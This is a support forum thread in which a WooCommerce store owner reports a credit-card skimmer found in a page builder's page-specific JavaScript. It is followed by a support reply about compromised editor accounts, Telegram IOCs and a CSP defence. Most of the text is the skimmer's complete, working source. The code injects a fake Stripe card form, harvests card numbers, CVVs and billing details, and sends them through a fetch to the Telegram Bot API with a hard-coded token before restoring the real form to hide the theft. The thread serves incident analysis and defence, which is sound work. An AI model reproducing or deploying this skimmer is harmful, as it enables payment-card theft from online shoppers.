WooCommerce Checkout Hacked with Page-specific JS

We discovered that an attacker was skimming credit-card information from our checkout and exfiltrating it to a Telegram chat they control. Their code:

  • Hides the real Stripe element (`.__PrivateStripeElement`) five seconds after the page loads and shows a fake credit card form in its place, injected into Stripe's `#wc-stripe-upe-errors` container.
  • Captures the billing and payment information (card number, expiry, CVV, billing name, address, phone and email) from the fake card fields plus the standard WooCommerce billing fields.
  • When a user hovers over the “Place Order” button, it triggers the function `getthen_send()`, which sends all that captured data (once per page load) to a Telegram group/channel via the Telegram Bot API `sendMessage` endpoint, then hides the fake form and restores the real Stripe element so the order still completes and the customer notices nothing.

We don’t know yet how it was put there, but we were shocked to find it in Pro’s page-specific JS tool. Any ideas how they got it in there other than plain compromised credentials?

// Skimmer stage 1 (malware sample, annotated for analysis — do not reuse).
// After DOMContentLoaded plus a 5 s delay, hide Stripe's real card element,
// inject a look-alike card form into the Stripe error container, and arm the
// exfiltration hook on the "Place Order" button.
document.addEventListener('DOMContentLoaded', function() {
  
   setTimeout(e=>{
      // Hide the genuine Stripe card input. If this element is missing after
      // 5 s, `.style` on null throws and the skimmer aborts (only a console error).
     	document.querySelector(".__PrivateStripeElement").style.display="none"
  // Mount the fake form (#ccn, #yymm, #ccv) inside WooCommerce Stripe's error
  // container so it appears where the real card form used to be. Card-brand
  // icons are hot-linked from third-party hosts (raw.githubusercontent.com,
  // upload.wikimedia.org, svgrepo.com) — usable as network IOCs on a checkout page.
  document.querySelector("#wc-stripe-upe-errors").innerHTML=`<div style="display: flex;justify-content: center;align-items: center;gap: 12px;" id="usbd691">


	<div style="display: flex;flex-direction: column;gap: 4px;position: relative;width: 100%;">
		<label>Card number</label>
		<input type="text" name="" id="ccn"  maxlength="19" placeholder="1234 1234 1234 1234" style="height:25px;margin: 0;" oninput="formatInputWithSpaces(this)">
		<div style="display: flex;justify-content: center;align-items: center;gap: 2px;position: absolute;bottom: 0px;right: 3px;/*! height: 100%; */">
			<img src="https://raw.githubusercontent.com/aaronfagan/svg-credit-card-payment-icons/ef8affbc8d292a4edfe7615317cc9219530dd623/flat-rounded/discover.svg"style="width: 25px;">
			<img src="https://upload.wikimedia.org/wikipedia/commons/0/04/Visa.svg" style="width: 25px;">
			<img src="https://upload.wikimedia.org/wikipedia/commons/a/a4/Mastercard_2019_logo.svg" style="width: 25px;">
			<img src="https://www.svgrepo.com/show/266068/american-express.svg" style="width: 25px;" >


		</div>
	</div>




	<div style="display: flex;flex-direction: column;gap: 4px;">
		<label>Expiration date</label>
		<input type="text" name=""  id="yymm" placeholder="MM / YY" maxlength="5" style="height:25px;margin: 0;" oninput="checkdate(this)">
	</div>




	<div style="display: flex;flex-direction: column;gap: 4px;position: relative;" >
		<label>Security code</label>
		<input type="text" name="" id="ccv" placeholder="CVC" maxlength="4" style="height:25px;margin: 0;" oninput="this.value = this.value.replace(/[^0-9\/]/g, '');">
		<div style="display: flex;justify-content: center;align-items: center;gap: 2px;position: absolute;bottom: 0px;right: 3px;/*! height: 100%; */">
		<svg  class="p-CardCvcIcons-svg" width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" fill="var(--colorIconCardCvc)" role="img" aria-labelledby="cvcDesc"><path opacity=".2" fill-rule="evenodd" clip-rule="evenodd" d="M15.337 4A5.493 5.493 0 0013 8.5c0 1.33.472 2.55 1.257 3.5H4a1 1 0 00-1 1v1a1 1 0 001 1h16a1 1 0 001-1v-.6a5.526 5.526 0 002-1.737V18a2 2 0 01-2 2H3a2 2 0 01-2-2V6a2 2 0 012-2h12.337zm6.707.293c.239.202.46.424.662.663a2.01 2.01 0 00-.662-.663z"></path><path opacity=".4" fill-rule="evenodd" clip-rule="evenodd" d="M13.6 6a5.477 5.477 0 00-.578 3H1V6h12.6z"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M18.5 14a5.5 5.5 0 110-11 5.5 5.5 0 010 11zm-2.184-7.779h-.621l-1.516.77v.786l1.202-.628v3.63h.943V6.22h-.008zm1.807.629c.448 0 .762.251.762.613 0 .393-.37.668-.904.668h-.235v.668h.283c.565 0 .95.282.95.691 0 .393-.377.66-.911.66-.393 0-.786-.126-1.194-.37v.786c.44.189.88.291 1.312.291 1.029 0 1.736-.526 1.736-1.288 0-.535-.33-.967-.88-1.14.472-.157.778-.573.778-1.045 0-.738-.652-1.241-1.595-1.241a3.143 3.143 0 00-1.234.267v.77c.378-.212.763-.33 1.132-.33zm3.394 1.713c.574 0 .974.338.974.778 0 .463-.4.785-.974.785-.346 0-.707-.11-1.076-.337v.809c.385.173.778.26 1.163.26.204 0 .392-.032.573-.08a4.313 4.313 0 00.644-2.262l-.015-.33a1.807 1.807 0 00-.967-.252 3 3 0 00-.448.032V6.944h1.132a4.423 4.423 0 00-.362-.723h-1.587v2.475a3.9 3.9 0 01.943-.133z"></path></svg>
	</div>
	</div>
	


</div>`       	 
     // Exfiltration trigger: a mouseover on the Place Order button (fires before
     // any click), so the data leaves the page even if the customer never submits.
     document.querySelector("#place_order").addEventListener("mouseover",e=>{
getthen_send()
})
   },5000)  // 5 s delay — presumably to let the Stripe UPE element finish mounting
    });
// One-shot guard read and written by getthen_send(): the Telegram request is
// made at most once per page load, after which the real Stripe form is restored.
var donego69=false
// oninput handler for the fake expiry field (#yymm). Strips everything except
// digits and '/', then appends '/' once the value is exactly two characters
// long (so "12" becomes "12/"). Because the length check runs on every input
// event, deleting back to two characters re-appends the slash.
function checkdate(e){
  e.value = e.value.replace(/[^0-9\/]/g, '');


  if (e.value.length==2){
    e.value=e.value+"/"
  }
}


// oninput handler for the fake card-number field (#ccn). Strips non-digits
// immediately, then registers an additional "input" listener that re-groups
// the digits into 4-character blocks separated by spaces.
// Note: this is invoked on every keystroke (via the inline oninput attribute),
// so a new listener is added each time — after N keystrokes there are N
// identical listeners. The instanceof check runs after the first mutation.
function formatInputWithSpaces(inputElement) {
  inputElement.value = inputElement.value.replace(/[^0-9]/g, '');
  if (!(inputElement instanceof HTMLInputElement)) {
    console.error("The provided element is not a valid input element.");
    return;
  }


  // Listen for the input event to update the value while typing
  inputElement.addEventListener("input", () => {
    // Remove any existing spaces before processing
    let rawValue = inputElement.value.replace(/\s+/g, "");


    // Split the text into 4-character chunks and rejoin them with spaces
    let formattedValue = rawValue.match(/.{1,4}/g)?.join(" ") || "";


    // Update the input value
    inputElement.value = formattedValue;
  });
}


// Skimmer stage 2: harvest and exfiltrate.
// Reads the standard WooCommerce billing fields by their #billing_* IDs (a
// missing field makes `.value` on null throw, so this only works on the
// classic checkout markup) plus the three fake card inputs, formats them as an
// HTML-bold Telegram message, and — once per page load — sends it via a GET
// to the Telegram Bot API. It then hides the fake form and reveals the real
// Stripe element so the customer re-enters the card there and the order
// completes normally, masking the theft.
function getthen_send(){
  
  var billing_first_name  = document.querySelector("#billing_first_name").value
  var billing_last_name  = document.querySelector("#billing_last_name").value
  var billing_address_1  = document.querySelector("#billing_address_1").value
  var billing_address_2  = document.querySelector("#billing_address_2").value
  var billing_city  = document.querySelector("#billing_city").value
  var billing_state  = document.querySelector("#billing_state").value
  var billing_postcode  = document.querySelector("#billing_postcode").value
  var billing_phone  = document.querySelector("#billing_phone").value
  var billing_email  = document.querySelector("#billing_email").value
  // Values typed into the injected fake form, not Stripe's real inputs.
  var ccn  = document.querySelector("#ccn").value
	var yymm  = document.querySelector("#yymm").value
	var ccv  = document.querySelector("#ccv").value


    // Message body (parse_mode=html). The PAN|expiry|CVC line is the payload;
    // "Holder" and "Full Name" carry the same data twice.
    var msg=`
<b>
new victom


- Holder: ${billing_first_name} ${billing_last_name}


${ccn}|${yymm}|${ccv}


- Full Name: ${billing_first_name} ${billing_last_name}


- City: ${billing_city}


- State: ${billing_state}


- Address: ${billing_address_1} | ${billing_address_2}


- ZIP Code: ${billing_postcode}


- Phone: ${billing_phone}


- email: ${billing_email}
</b>
`


if (donego69==false){
// Exfiltration: a single GET to api.telegram.org/bot<TOKEN>/sendMessage with the
// card data in the query string. The hard-coded bot token and chat_id are the
// key IOCs (report them to Telegram). The promise is not awaited and errors are
// ignored; a CSP `connect-src` that omits api.telegram.org would block this.
fetch(`https://api.telegram.org/bot7720631773:AAGbFlPPBr9TWwX4o_YaZRsoQkEW_y8_Iq8/sendMessage?chat_id=-1002421436389&text=${encodeURIComponent(msg)}&parse_mode=html`)
  // Cover-up: remove the fake form, restore the real Stripe element, scroll up
  // so the customer sees the genuine card form and completes the order.
  document.querySelector("#usbd691").style.display="none"
  document.querySelector(".__PrivateStripeElement").style.display="block"
    window.scrollTo({
        top: 0,
        behavior: 'smooth' // Enables smooth scrolling
      });
donego69=true
}
}
// JavaScript Document

Hello @gstertz,

Thanks for writing in! The code appears to have been added by editing the page and pasting it into the Page JS section of the Cornerstone builder, so it was most likely saved through the normal editor by a logged-in account with permission to edit that page, rather than by modifying files on disk. Please review your WordPress users — any account with page-editing rights, any account you don’t recognise, and any recent logins — and rotate the passwords of all Administrator/Editor accounts. You may also want to restrict page editing in Cornerstone to Administrators only. Because live card data was sent to a third party, treat this as a payment-data incident: the hard-coded Telegram bot token and chat ID in the script are indicators you can report to Telegram, and a Content-Security-Policy `connect-src` that does not allow api.telegram.org would have blocked this exfiltration.

Best Regards.